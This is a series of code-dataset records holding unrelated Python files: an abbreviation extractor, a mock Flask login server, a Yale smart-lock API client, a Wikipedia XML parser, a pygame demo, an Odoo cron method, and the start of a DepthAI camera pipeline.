sfPresent:\n\n jargon += [[sf[0], abbrev]]\n upperform += \" \" + re.sub('[()]', '', sf[1]) + \" \"\n frequency += [[abbrev, sf[2]]]\n\n # use the universal shortforms\n for sf in universals:\n\n sfPresent = sf[1].lower() in term.split(\":\")\n lfPresent = sf[0].lower() in orig.lower()\n \n if sfPresent and not lfPresent:\n\n jargon += [[sf[0], sf[1]]]\n upperform += \" \" + sf[0].lower()\n\n if lfPresent and not sfPresent:\n jargon += [[sf[0], sf[1]]]\n upperform += \" \" + sf[1] + \" \"\n\n if len(jargon)>0: \n return inRow + [jargon, upperform, frequency]\n else:\n return inRow\n\n \n### OLD CODE ###\n\nclass StdevFunc:\n def __init__(self):\n self.M = 0.0\n self.S = 0.0\n self.k = 1\n\n def step(self, value):\n if value is None:\n return\n tM = self.M\n self.M += (value - tM) / self.k\n self.S += (value - tM) * (value - self.M)\n self.k += 1\n\n def finalize(self):\n if self.k < 3:\n return 0\n return math.sqrt(self.S / (self.k-2))\n\ndef _split_by_abbrevs(toSplit): # splits a string by \")\", but only if the term in parentheses matches criteria for abbreviations\n out = []\n split_indices = [0]\n index = 0\n while toSplit.find(\"(\",index) != -1:\n index = toSplit.find(\"(\",index) + 1\n endex = toSplit.find(\")\",index)\n abbreviation = toSplit[index:endex]\n # Criteria for abbreviations should go below\n if not bool(re.search(r'\\d+', abbreviation)) and 1 < len(abbreviation) < 7 and bool(re.search(\"[A-Z]\", abbreviation)) and abbreviation.lower() not in elements and not bool(re.search(\"^(IX|IV|V?I{0,3})$\", abbreviation)) and not bool(re.search(\"^[A-Z]{1}[a-z]{3,}$\", abbreviation)) and abbreviation[0] not in string.punctuation:\n split_indices.append(endex)\n split_indices.append(len(toSplit))\n for qqq in range(len(split_indices)-1):\n out.append(toSplit[split_indices[qqq] : split_indices[qqq+1]])\n return out\n\ndef _look_back(put,ID): # Pass in string delimited by \")\"\n put = str(put)\n out = []\n split_input=[]\n # split_input should contain in index 0 the abbreviation and in index 1 the string that preceeds it\n split_index = put.rfind('(',0,-2) +1\n split_input.append(put[0:split_index - 2])\n split_input.append(put[split_index: len(put)])\n if len(split_input[0]) == 0:\n return\n back = 0\n # back stores the number of words to look back, based on the abbreviation\n out.append(\" (\" + split_input[1] + \")\")\n for i in split_input[1]:\n if i not in string.punctuation and i not in string.whitespace:\n back += 1\n if bool(re.search(\".*[s]$\", split_input[1])): # Plurals often have an 's' tacked onto the end of the abbreviation proper - this accounts for that\n back -= 1\n end_index = len(split_input[0])\n if split_input[0][len(split_input[0])-1] in string.whitespace:\n end_index -= 1\n q = 0\n # This loop will look back as many words as there are characters in the abbreviation, except in special cases noted at the end\n while q < back:\n beg_index = end_index - 1\n if beg_index < 0:\n break\n while split_input[0][beg_index] not in string.whitespace and split_input[0][beg_index] != '-':\n beg_index -= 1\n if beg_index <= 0:\n break\n if split_input[0][beg_index] == '-':\n nex = split_input[0][beg_index : end_index]\n else:\n nex = split_input[0][beg_index + 1 : end_index]\n # At this point nex will have the next word stored in it\n # Below are the conditions under which nex will be added to out\n if len(nex) == 0:\n break\n if nex[len(nex) - 1] == ',' or (nex[len(nex) - 1] == '.' 
and len(nex) > 2) or nex.lower() in stoppers or \">\" in nex:\n break\n out.append(nex)\n if len(nex) > 14 and nex[0].lower() == split_input[1][0].lower() and not split_input[1][0] == split_input[1][len(split_input[1])-1]:\n break\n end_index = beg_index\n if nex.lower() not in blacklist: #blacklisted words don't count towards the total\n q += 1\n if nex.lower() in doubles or split_input[0][beg_index + 1 : end_index].lower() in doubles: #doubles will count twice\n q += 1\n if nex.lower() == 'x' and out[len(out)-2].lower() == '-ray':\n q -= 1\n # end while loop\n out.reverse()\n while out[0] in blacklist or out[0] in string.punctuation:\n del out[0]\n if out[0][0] in string.punctuation:\n out[0] = out[0][1:len(out[0])]\n if bool(re.search(\"^[0-9]{1,2}[\\)]{1}\", out[0])):\n out[0] = out[0].split(')' ,1)[1]\n real_out = [\"\",\"\"]\n for index in range(len(out)-1):\n real_out[0] += out[index]\n if out[index + 1][0] != '-':\n real_out[0] += \" \"\n real_out[1] = out[len(out)-1]\n letters = 0\n for maybe_letter in real_out[0]:\n if maybe_letter in string.ascii_letters:\n letters += 1\n if letters < len(real_out[0])/2:\n return\n real_out.append(ID)\n# real_out.append(put)\n real_out[0] = real_out[0].lstrip()\n if len(real_out[0]) == 0 or not real_out[0][0].lower() == real_out[1][2].lower() or real_out[0].lower() in elements:\n return\n for ab in real_out[1]:\n if ab.lower() not in real_out[0].lower() and ab.lower() in string.ascii_lowercase:\n return\n return real_out\n\n\ndef _process(input, searchIndex, IDIndex, db, tab):\n raw = []\n for readNext in input:\n entry = _split_by_abbrevs(readNext[searchIndex])\n ID = readNext[IDIndex]\n for abrev in entry:\n put = _look_back(abrev,ID)\n if put not in raw and put is not None:\n raw.append(put)\n conn = sqlite3.connect(db)\n conn.create_aggregate(\"stdev\", 1, StdevFunc)\n curse = conn.cursor()\n curse.execute(\"CREATE TABLE IF NOT EXISTS \" + tab + \"(longs TEXT, short TEXT, ID TEXT, freq INT, stdv FLOAT, avrge FLOAT, suspect TEXT)\")\n # Put raw values in SQL table\n for row in raw:\n to_insert = [row[0].lower().strip(),row[1].strip(),row[2]]\n\n curse.execute(\"INSERT INTO \"+tab+\"(longs, short, ID) VALUES (?,?,?)\", to_insert)\n # Mark suspicious entries\n curse.execute(\"SELECT DISTINCT longs, short FROM \" + tab)\n for unique in curse.fetchall():\n curse.execute(\"SELECT COUNT(longs) FROM \" + tab + \" WHERE longs = ? AND short = ?\", unique)\n freq = int(curse.fetchone()[0])\n curse.execute(\"UPDATE \" + tab + \" SET freq = ? WHERE longs = ? 
AND short = ?\",(freq, unique[0], unique[1]))\n check_unique = []\n check_unique.append(unique[0])\n check_unique.append(unique[1])\n to_cut = []\n for ind in range(len(check_unique[1])):\n if check_unique[1][ind] in string.ascii_lowercase or (check_unique[1][ind] in string.punctuation and not (check_unique[1][ind] == \"(\" or check_unique[1][ind] == \")\")):\n to_cut.append(ind)\n if not len(to_cut) == 0:\n replacR = check_unique[1][0:to_cut[0]]\n for bb in range(len(to_cut)-1):\n replacR += check_unique[1][to_cut[bb]+1:to_cut[bb+1]]\n if not to_cut[len(to_cut) - 1] + 1 == len(check_unique[1]):\n replacR += check_unique[1][to_cut[len(to_cut)-1]+1:len(check_unique[1])]\n check_unique[1] = replacR\n\n check_unique[0] = check_unique[0].replace(\"x-ray\",\"xray\")\n check_unique[0] = check_unique[0].replace(\"ultraviolet\",\"ultra violet\")\n spaceSplits = check_unique[0].split()\n for worb in spaceSplits:\n if worb.lower() in blacklist:\n spaceSplits.remove(worb)\n hyphenSplits = []\n for tip in spaceSplits:\n for crop in tip.split(\"-\"):\n hyphenSplits.append(crop)\n for pos in hyphenSplits:\n if len(pos) == 0:\n hyphenSplits.remove(pos)\n suspicious = \"No\"\n if not len(check_unique[1])-2 == len(hyphenSplits):\n suspicious = \"Yes\"\n else:\n try:\n for index in range(1,len(check_unique[1])-1):\n if not check_unique[1][index].lower() == hyphenSplits[index-1][0].lower():\n suspicious = \"Yes\"\n except:\n print(hyphenSplits + \" | \" + unique[1])\n\n curse.execute(\"UPDATE \" + tab + \" SET suspect = ? WHERE longs = ? AND short = ?\", (suspicious, unique[0], unique[1]))\n # Calculate standard deviation and average, write to SQL table\n curse.execute(\"SELECT DISTINCT short FROM \" + tab)\n x=curse.fetchall()\n for unique in x:\n curse.execute(\"SELECT stdev(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n #print(unique[0])\n z=curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET stdv = ? WHERE short = ?\", (z,unique[0].strip()))\n curse.execute(\"SELECT AVG(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n zz = curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET avrge = ? WHERE short = ?\", (zz,unique[0].strip()))\n curse.execute(\"SELECT DISTINCT short FROM \" + tab)\n x=curse.fetchall()\n for unique in x:\n curse.execute(\"SELECT stdev(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n #print(unique[0])\n z=curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET stdv = ? WHERE short = ?\", (z,unique[0].strip()))\n curse.execute(\"SELECT AVG(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n zz = curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET avrge = ? 
WHERE short = ?\", (zz,unique[0].strip()))\n if db != \":memory:\":\n conn.commit()\n curse.execute(\"SELECT * FROM \" + tab)\n return curse.fetchall()\n\ndef grab_table_write_table(fileIn, fileOut, abstractName, IDName): # Accepts two filepaths and two strings\n readR = csv.reader(open(fileIn, newline = \"\",encoding='utf-8-sig'), delimiter = \"\\t\") # readR will be used to read fileIn row by row (make sure it is a csv)\n firstRow = next(readR) # make sure fileIn has headers as well\n searchIndex = firstRow.index(abstractName)\n IDIndex = firstRow.index(IDName) # use searchIndex and IDIndex as indices to search and ID respectively\n processed = _process(readR,searchIndex,IDIndex,\":memory:\",\"tab\")\n out = open(fileOut, \"w\", newline = \"\",encoding='utf-8-sig')\n writeR = csv.writer(out, quoting = csv.QUOTE_ALL)\n writeR.writerow([\"Longform\",\"Shortform\",\"ID\",\"Frequency\",\"Standard Div\",\"Average\",\"Suspicious\"])\n writeR.writerows(processed)\n\ndef _grab_db_write_table(dbIn, tableIn, fileOut, abstractName, IDName):\n\n connIn = sqlite3.connect(dbIn)\n curseIn = connIn.cursor()\n curseIn.execute(\"SELECT \" + abstractName + \", \" + IDName + \" FROM \" + tableIn)\n input = curseIn.fetchall()\n processed = _process(input,0,1,\":memory:\",\"tab\")\n out = open(fileOut, \"w\", newline = \"\")\n writeR = csv.writer(out, quoting = csv.QUOTE_ALL)\n writeR.writerow([\"Longform\",\"Shortform\",\"Document-Jargon ID\",\"Frequency\",\"Standard Div\",\"Average\",\"Suspicious\"])\n writeR.writerows(processed)\n connIn.close()\n\ndef _grab_table_write_db(fileIn, dbOut, tableOut, abstractName, IDName):\n readR = csv.reader(open(fileIn, newline = \"\")) # readR will be used to read fileIn row by row (make sure it is a csv)\n firstRow = next(readR) # make sure fileIn has headers as well\n searchIndex = firstRow.index(abstractName)\n IDIndex = firstRow.index(IDName) # use searchIndex and IDIndex as indices to search and ID respectively\n _process(readR,searchIndex,IDIndex,dbOut,tableOut)\n\ndef _grab_db_write_db(dbIn, tableIn, dbOut, tableOut, abstractName, IDName):\n connIn = sqlite3.connect(dbIn)\n curseIn = connIn.cursor()\n curseIn.execute(\"SELECT \" + abstractName + \", \" + IDName + \" FROM \" + tableIn)\n input = curseIn.fetchall()\n _process(input,0,1,dbOut,tableOut)\n connIn.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"shortform/shortform.py","file_name":"shortform.py","file_ext":"py","file_size_in_byte":15224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224484421","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nCORS(app)\n\n@app.route('/ping', methods=['GET'])\ndef ping_pong():\n return jsonify('pong!')\n\n@app.route('/user/login', methods=['POST'])\ndef user_login():\n data = request.get_json(force=True)\n resp = {}\n resp[\"code\"] = 20000\n resp_data = {}\n resp_data[\"token\"] = \"admin\"\n resp[\"data\"] = resp_data \n return jsonify(resp)\n\n@app.route('/user/info', methods=['GET'])\ndef user_info():\n token = request.args.get('token')\n if token == 'admin':\n resp = {\n \"code\": 20000,\n \"data\": {\n \"roles\": [\n \"admin\"\n ],\n \"name\": \"admin\",\n \"avatar\": \"/src/assets/img/avatar1.png\"\n }\n }\n else:\n resp = {\n \"code\": 50000,\n \"data\": \"登录失败\"\n }\n return jsonify(resp)\n\n@app.route('/user/logout', methods=['POST'])\ndef user_logout():\n resp = {\n \"code\": 20000,\n \"data\": 
\"success\"\n }\n return jsonify(resp)\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n print(request.files)\n file = request.files['file']\n file.save('./lala.xls')\n # data = request.get_json(force=True)\n # print(data)\n return '0'","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506500101","text":"import logging\r\nimport requests\r\n\r\nfrom custom_components.doorman.log.log_wrapper import logger\r\nfrom custom_components.doorman.yale.exceptions import HttpResponseException, LoginException, UpdateException\r\nfrom custom_components.doorman.yale.updateable import Updateable\r\n\r\n\r\nfrom datetime import datetime\r\n\r\nclass YaleApi:\r\n BASE_URL = \"https://mob.yalehomesystem.co.uk/yapi\"\r\n\r\n LOGIN_URL = BASE_URL + \"/o/token/\"\r\n STATE_URL = BASE_URL + \"/api/panel/cycle/\"\r\n STATE_HISTORY_URL = BASE_URL + \"/api/event/report/?page_num=1&set_utc=1\"\r\n\r\n DOOR_UNLOCK = BASE_URL + \"/api/minigw/unlock/\"\r\n DOOR_LOCK = BASE_URL + \"/api/panel/device_control/\"\r\n\r\n YALE_AUTH_TOKEN = 'VnVWWDZYVjlXSUNzVHJhcUVpdVNCUHBwZ3ZPakxUeXNsRU1LUHBjdTpkd3RPbE15WEtENUJ5ZW1GWHV0am55eGhrc0U3V0ZFY2p0dFcyOXRaSWNuWHlSWHFsWVBEZ1BSZE1xczF4R3VwVTlxa1o4UE5ubGlQanY5Z2hBZFFtMHpsM0h4V3dlS0ZBcGZzakpMcW1GMm1HR1lXRlpad01MRkw3MGR0bmNndQ=='\r\n\r\n _LOGGER = logging.getLogger(__name__)\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n\r\n self.token = Token(self)\r\n\r\n @logger\r\n def login(self):\r\n return self.post(\r\n self.LOGIN_URL,\r\n data={\"grant_type\": \"password\", \"username\": self.username, \"password\": self.password},\r\n headers={\"Accept\": \"application/json\", \"Authorization\": f\"Basic {self.YALE_AUTH_TOKEN}\"})\r\n\r\n # @logger\r\n def get_state_data(self):\r\n json_message = self.get(\r\n self.STATE_URL,\r\n data=\"\",\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n return self.extract_message(json_message)\r\n\r\n # @logger\r\n def get_state_history_data(self):\r\n json_message = self.get(\r\n self.STATE_HISTORY_URL,\r\n data={\"page_num\": 1, \"set_utc\": 1},\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n return self.extract_message(json_message)\r\n\r\n # @logger\r\n def unlock(self, area, zone, pincode):\r\n # area=1&zone=1&pincode=xxxxxxxx\r\n return self.post(\r\n self.DOOR_UNLOCK,\r\n data={\"area\": area, \"zone\": zone, \"pincode\": pincode},\r\n headers=YaleApi.get_token_auth_header(self.token.data),)\r\n\r\n # @logger\r\n def lock(self, area, zone):\r\n # area=1&zone=1&device_type=device_type.door_lock&request_value=1\r\n return requests.post(\r\n self.DOOR_LOCK,\r\n data={\"area\": area, \"zone\": zone, \"device_type\": \"device_type.door_lock\", \"request_value\": 1},\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n\r\n def post(self, url, data, headers):\r\n response = requests.post(url, data=data, headers=headers)\r\n self.check_http_response(response)\r\n json = self.jsonify(response)\r\n return json\r\n\r\n def get(self, url, data, headers):\r\n response = requests.get(url, data=data, headers=headers, timeout=5)\r\n self.check_http_response(response)\r\n json = self.jsonify(response)\r\n return json\r\n\r\n def check_http_response(self, response: requests.Response) -> requests.Response:\r\n if response.status_code == 200:\r\n return\r\n elif response.status_code == 401:\r\n raise 
LoginException(f\"Invalid credentials given: {response.text}\")\r\n else:\r\n self._LOGGER.error(f\"Unknown error retrieving http response: {response.status_code} : {response.text}\")\r\n\r\n def jsonify(self, response: requests.Response):\r\n try:\r\n json = response.json()\r\n return json\r\n except Exception as error:\r\n raise Exception(f\"Failed to convert to json, {error}\")\r\n\r\n def extract_message(self, json):\r\n status = json[\"message\"]\r\n if status != \"OK!\":\r\n raise Exception(f\"Status is not OK: {status}\")\r\n return json.get(\"data\")\r\n\r\n def get_token_auth_header(token):\r\n return {\"Authorization\": f\"Bearer {token}\"}\r\n\r\n\r\nclass Token(Updateable):\r\n def __init__(self, yale_api):\r\n super().__init__(None, -1)\r\n\r\n self.yale_api = yale_api\r\n\r\n def update(self):\r\n login_json = self.yale_api.login()\r\n token = login_json[\"access_token\"]\r\n self.time_valid = login_json[\"expires_in\"]\r\n return token\r\n","sub_path":"custom_components/doorman/yale/yale_api.py","file_name":"yale_api.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31308548","text":"class CharacterSet:\n\n def __init__(self): \n import pandas as pd \n charlist = pd.read_csv('charlist.csv') \n charlist = list(charlist['Unicode']) \n char2ind = {x: i for i, x in enumerate(charlist)} \n ind2char = {}\n\n for char in char2ind:\n ind2char[char2ind[char]] = char\n\n self.ind2char = ind2char \n self.char2ind = char2ind\n self.num_characters = len(char2ind)\n","sub_path":"icdar/character_set.py","file_name":"character_set.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500753884","text":"# RainingDots.py\nimport random\nimport pygame\n\npygame.init()\nscreen = pygame.display.set_mode([800,600])\nkeep_going = True\ntimer = pygame.time.Clock()\ncolors = [0]*100\nlocations = [0]*100\nsizes = [0]*100\n\n# Store random values in colors, locations, sizes\nfor n in range(100):\n colors[n] = (random.randint(0, 255), random.randint(0, 255),random.randint(0, 255),)\n locations[n] = (random.randint(0,800), random.randint(0,600))\n sizes[n] = random.randint(10, 100)\n\nwhile keep_going:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keep_going = False\n for n in range(100):\n pygame.draw.circle(screen, colors[n], locations[n], sizes[n])\n new_x = locations[n][0] + 1 # x + 1\n new_y = locations[n][1] + 1 # y + 1\n locations[n] = (new_x, new_y)\n if new_x > 800:\n new_x -= 800\n if new_y > 600:\n new_y -= 600\n locations[n] = (new_x, new_y)\n pygame.display.update() \n timer.tick(60)\npygame.quit()\n","sub_path":"RainingDots.py","file_name":"RainingDots.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38836962","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api\n\n\nclass DeliveryCarrier(models.Model):\n _inherit = 'delivery.carrier'\n\n @api.model\n def _cron_check_delivery_carrier(self, sale_order_id, warehouse_id, logistics_code, weight, quantity):\n sale_order = self.env['sale.order'].browse(sale_order_id)\n warehouse = self.env['stock.warehouse'].browse(warehouse_id)\n fee = self.get_delivery_fee_by_weight(sale_order, warehouse, logistics_code, weight, quantity)\n print('发货城市:', warehouse.city_id.name)\n print('收货省:', sale_order.consignee_state_id.name)\n 
print('Weight:', weight)\n        print('Delivery fee:', fee)\n\n\n","sub_path":"tmpaddons/cj_api_temp/models/delivery_carrier.py","file_name":"delivery_carrier.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70458167","text":"from tkinter import *\nfrom random import choice\nfrom time import perf_counter\n\n# sx and sy are the horizontal and vertical speed of the ball\n# in pixels per animation step\nblock, ball, sx, sy = None, None, 5, 5\nfieldSize, goalSize, ballSize = 600, 25, 10\n\n# returns position of the *center* of the ball\ndef ballPosition():\n    x1, y1, x2, y2 = list(field.coords(ball))\n    return [(x1+x2)/2, (y1+y2)/2]\n\ndef startGame():\n    global startTime, ball, block\n    # remember to delete block and ball from previous game\n    if block:\n        field.delete(block)\n        block = None\n    if ball:\n        field.delete(ball)\n    # place ball at random\n    upperLeftX = choice(list(range(fieldSize-ballSize)))\n    upperLeftY = choice(list(range(fieldSize-ballSize)))\n    ball = field.create_oval(upperLeftX, upperLeftY,\n                             upperLeftX+ballSize, upperLeftY+ballSize,\n                             fill='blue')\n    startTime = perf_counter()\n    animate()\n    \ndef animate():\n    global sx, sy\n    pattern = 'Elapsed time: {0:.2f} seconds'\n    timeDisplay['text'] = pattern.format(perf_counter()-startTime)\n    x, y = ballPosition()\n    hitVertical = hitBlock() and blockType == 'vertical'\n    if x+sx>fieldSize or x+sx<0 or hitVertical:\n        sx *= -1\n    hitHorizontal = hitBlock() and blockType == 'horizontal'\n    if y+sy>fieldSize or y+sy<0 or hitHorizontal:\n        sy *= -1\n    field.move(ball, sx, sy)\n    if not inGoal():\n        root.after(20, animate)\n    \n# Only one block at a time; delete one before creating the next\n\ndef leftClick(event):\n    global block, blockType\n    if block:\n        field.delete(block)\n    block = field.create_rectangle(event.x-20, event.y,\n                                   event.x+20, event.y+6,\n                                   fill='light green')\n    blockType = 'horizontal'\n    \ndef rightClick(event):\n    global block, blockType\n    if block:\n        field.delete(block)\n    block = field.create_rectangle(event.x, event.y-20,\n                                   event.x+6, event.y+20,\n                                   fill='light green')\n    blockType = 'vertical'\n    \n# return True if the center of the ball is inside the\n# block’s boundary\ndef hitBlock():\n    if not block:\n        return False\n    ballX, ballY = ballPosition()\n    blockX1, blockY1, blockX2, blockY2 = field.coords(block)\n    return (blockX1 <= ballX <= blockX2 and\n            blockY1 <= ballY <= blockY2)\n\n# return True if the center of the ball is inside the\n# goal area\ndef inGoal():\n    ballX, ballY = ballPosition()\n    return 0 <= ballX <= goalSize and fieldSize-goalSize <= ballY <= fieldSize\n\n\n\nroot = Tk()\n\ntimeDisplay = Label(root)\ntimeDisplay.pack()\n\nfield = Canvas(root, width=fieldSize, height=fieldSize, bg='light blue')\nfield.pack()\n\nstartButton = Button(root, command=startGame, text='Go')\nstartButton.pack()\n\n# the goal\nfield.create_rectangle(0, fieldSize-goalSize, goalSize, fieldSize, fill='red')\n\n# bind left and right mouse clicks to the block-placing handlers\nfield.bind('<Button-1>', leftClick)\nfield.bind('<Button-3>', rightClick)\n\n\n\nmainloop()\n\n","sub_path":"Unit11-1.py","file_name":"Unit11-1.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465146025","text":"\"\"\"WikiParser Module.\n\nCopyright (c) 2017 Gabriel Ramirez ~ Licensed under the MIT License\n\nThis module contains all the parsing and data storage aspects of the algorithm.\n\nTODO:\nBetter elimination of Wikipedia Markup\"\"\"\n\nimport os.path\nimport re\nimport string\nimport 
 _internal_links_regex = re.compile(r'\[\[([\(\).a-zA-Z0-9\s\-\,\:]*)\|?([\(\).a-zA-Z0-9\s\-\,\:]*)?\]\]')\n _formatting_regex = re.compile(r'\&\S+;')\n _curly_regex = re.compile(r'{{(?!infobox)[\s\S]*?}}')\n _tag_regex = re.compile(r'<.+?>')\n _external_link_regex = re.compile(r'\[.*?\]')\n _character_regex = re.compile(r'[^a-z\s]')\n _title_regex = re.compile(r'=+[a-zA-Z]+=+')\n _infobox_regex = re.compile(r'\|\s[a-z]+\s+=\s')\n\n def __init__(self, vocabulary, stop_words=shared.STOP_WORDS):\n \"\"\"Init function.\n :param vocabulary: The vocabulary for the parser. Default is None.\n :type vocabulary: iterable\n :param stop_words: The stop words for the parser. Default is defined in esa_relate.constants\n :type stop_words: set\"\"\"\n\n self._inner_dict = {}\n self.vocabulary = {shared.stemmer.stemWord(w) for w in vocabulary}\n self.stop_words = stop_words\n self.doc_count = 0\n self.namespace = ''\n\n def parse_xml(self, path):\n \"\"\"Parses the XML dump located at the file. If vocabulary is set to None this will use a ton of memory.\n :param path: The path of the xml dump.\n :type path: str\n :returns TextModel\n :raises IOError\"\"\"\n\n if not os.path.exists(path):\n raise IOError('File does not exist at path.')\n\n with open(path) as file:\n ns_line = file.readline()\n regex = r'xmlns=\"([\S]+)\"'\n\n for ns in re.findall(regex, ns_line):\n self.namespace = ns\n\n if not self.namespace:\n shared.logger.warning('XML file had no namespace... 
proceeding but this might not work.')\n\n tag = '{{{}}}page'.format(self.namespace) if self.namespace else 'page'\n context = etree.iterparse(path, tag=tag)\n\n self._fast_iter(context)\n\n vectors = {}\n\n for word in self._inner_dict.keys():\n\n idf = numpy.log(self.doc_count / len(self._inner_dict[word]))\n tArray=[]\n\n for pageID, tf_score in self._inner_dict[word]:\n tArray.append((pageID, tf_score * idf))\n\n vectors[word] = sorted(tArray, key=lambda x: x[1], reverse=True)[:50]\n\n tm = TextModel(vectors=vectors)\n self._inner_dict.clear()\n\n return tm\n\n def _respond_to_element(self, element):\n \"\"\"Responds to fast_iter.\n :param element: The element\n :type element: lxml.Element\"\"\"\n\n self.doc_count += 1\n\n prefix = '{{{}}}'.format(self.namespace) if self.namespace else ''\n page_id = int(element.find(prefix + 'id').text)\n namespace = int(element.find(prefix + 'ns').text)\n text = element.find(prefix + 'revision').find(prefix + 'text').text\n\n if self.doc_count % 10000 == 0:\n shared.logger.info('Article {}: {}'.format(self.doc_count, page_id))\n\n if text is None:\n return\n\n if namespace != 0:\n return\n\n if len(text) < 500:\n return\n\n temp_dict = {}\n\n for word in self._parse_text(text):\n if word in temp_dict:\n temp_dict[word] += 1\n\n else:\n temp_dict[word] = 1\n\n total = sum(temp_dict.values())\n\n for word, count in temp_dict.items():\n if word in self._inner_dict:\n self._inner_dict[word].append((page_id, count/total))\n else:\n self._inner_dict[word] = [(page_id, count/total)]\n\n def _parse_text(self, text):\n \"\"\"Yields the relevant and stemmed words in the text.\n :param text: The text\n :type text: str\"\"\"\n\n text = text.lower()\n text = ''.join((l for l in text if ord(l) < 128))\n\n words = []\n\n text = self._formatting_regex.sub('', text)\n text = self._curly_regex.sub('', text)\n\n for link in self._internal_links_regex.findall(text):\n if link[1] != '':\n words.extend(link[1].split())\n\n else:\n words.extend(link[0].split())\n\n text = self._internal_links_regex.sub(' ', text)\n text = self._external_link_regex.sub(' ', text)\n text = self._tag_regex.sub(' ', text)\n text = self._curly_regex.sub(' ', text)\n text = self._title_regex.sub(' ', text)\n text = self._infobox_regex.sub(' ', text)\n text = self._character_regex.sub(' ', text)\n\n words.extend(text.split())\n\n generator = (shared.stemmer.stemWord(w.rstrip()) for w in words if (len(w) > 1 and w not in self.stop_words))\n\n for w in generator:\n if self.vocabulary is not None:\n if w in self.vocabulary:\n yield w\n else:\n yield w\n\n def _fast_iter(self, context):\n \"\"\"Iterates efficiently over tags and calls func on each. 
(Internal use only)\n Credit: Liza Daly - High Performance XML parsing in Python with lxml (IBM developerWorks)\n :param context: The lxml context\n :type context: lxml.etree.iterparse\"\"\"\n\n for event, elem in context:\n self._respond_to_element(elem)\n elem.clear()\n\n while elem.getprevious() is not None:\n del elem.getparent()[0]\n\n del context","sub_path":"esa_relate/wiki_parser.py","file_name":"wiki_parser.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"289303492","text":"from pathlib import Path\n\nfrom imutils.video import FPS\n\nfrom .utils import *\n\n\nclass DepthAI:\n def __init__(\n self,\n file=None,\n camera=False,\n ):\n print(\"Loading pipeline...\")\n self.file = file\n self.camera = camera\n self.fps_cam = FPS()\n self.fps_nn = FPS()\n self.create_pipeline()\n self.start_pipeline()\n self.fontScale = 1 if self.camera else 2\n self.lineType = 0 if self.camera else 3\n\n def create_pipeline(self):\n print(\"Creating pipeline...\")\n self.pipeline = depthai.Pipeline()\n\n if self.camera:\n # ColorCamera\n print(\"Creating Color Camera...\")\n self.cam = self.pipeline.createColorCamera()\n self.cam.setPreviewSize(self._cam_size[1], self._cam_size[0])\n self.cam.setResolution(\n depthai.ColorCameraProperties.SensorResolution.THE_1080_P\n )\n self.cam.setInterleaved(False)\n self.cam.setBoardSocket(depthai.CameraBoardSocket.RGB)\n self.cam.setColorOrder(depthai.ColorCameraProperties.ColorOrder.BGR)\n\n self.cam_xout = self.pipeline.createXLinkOut()\n self.cam_xout.setStreamName(\"preview\")\n self.cam.preview.link(self.cam_xout.input)\n\n self.create_nns()\n\n print(\"Pipeline created.\")\n\n def create_nns(self):\n pass\n\n def create_nn(self, model_path: str, model_name: str, first: bool = False):\n \"\"\"\n :param model_path: model path\n :param model_name: model abbreviation\n :param first: Is it the first model\n :return:\n \"\"\"\n # NeuralNetwork\n print(f\"Creating {Path(model_path).stem} Neural Network...\")\n model_nn = self.pipeline.createNeuralNetwork()\n model_nn.setBlobPath(str(Path(model_path).resolve().absolute()))\n model_nn.input.setBlocking(False)\n if first and self.camera:\n print(\"linked cam.preview to model_nn.input\")\n self.cam.preview.link(model_nn.input)\n else:\n model_in = self.pipeline.createXLinkIn()\n model_in.setStreamName(f\"{model_name}_in\")\n model_in.out.link(model_nn.input)\n\n model_nn_xout = self.pipeline.createXLinkOut()\n model_nn_xout.setStreamName(f\"{model_name}_nn\")\n model_nn.out.link(model_nn_xout.input)\n\n def start_pipeline(self):\n self.device = depthai.Device(self.pipeline)\n print(\"Starting pipeline...\")\n\n self.start_nns()\n\n if self.camera:\n self.preview = self.device.getOutputQueue(\n name=\"preview\", maxSize=4, blocking=False\n )\n\n def start_nns(self):\n pass\n\n def put_text(self, text, dot, color=(0, 0, 255), font_scale=None, line_type=None):\n font_scale = font_scale if font_scale else self.fontScale\n line_type = line_type if line_type else self.lineType\n dot = tuple(dot[:2])\n cv2.putText(\n img=self.debug_frame,\n text=text,\n org=dot,\n fontFace=cv2.FONT_HERSHEY_COMPLEX,\n fontScale=font_scale,\n color=color,\n lineType=line_type,\n )\n\n def parse(self):\n if debug:\n self.debug_frame = self.frame.copy()\n\n self.parse_fun()\n\n if debug:\n cv2.imshow(\n \"Camera_view\",\n 